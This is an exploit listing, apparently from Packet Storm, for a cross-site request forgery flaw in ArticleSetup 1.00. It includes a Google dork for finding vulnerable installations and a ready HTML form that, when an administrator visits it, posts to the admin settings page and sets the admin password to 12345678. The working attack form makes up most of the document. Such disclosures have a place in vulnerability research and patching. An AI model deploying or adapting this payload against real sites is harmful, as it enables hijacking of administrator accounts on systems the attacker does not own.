ArticleSetup version 1.00 suffers from a cross site request forgery vulnerability.
1f458022debc10195e34d8866e66c26e6df8f427f0e1908ceeaa5a4a52d67057<!--
# Exploit Title : ArticleSetup 1.00 - CSRF Change Admin Password
# Google Dork : inurl:/article.php?id= intext:Powered By Article Marketing
# Date: 2016/06/04
# Exploit Author: Ali Ghanbari
# Vendor Homepage: http://articlesetup.com/
# Software Link: http://www.ArticleSetup.com/downloads/ArticleSetup-Latest.zip
# Version: 1.00
#Desc:
When admin click on malicious link , attacker can login as a new
Administrator
with the credentials detailed below.
#Exploit:
-->
<html>
<body>
<form method="post" action="
http://localhost/{PACH}/admin/adminsettings.php">
<input type="hidden" name="update" value="1">
<input type="hidden" name="pass1" type="hidden" value="12345678" >
<input type="hidden" name="pass2" type="hidden" value="12345678" >
<input type="submit" value="create">
</form>
</body>
</html>
<!--
####################################
[+]Exploit by: Ali Ghanbari
[+]My Telegram :@Exploiter007
-->
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed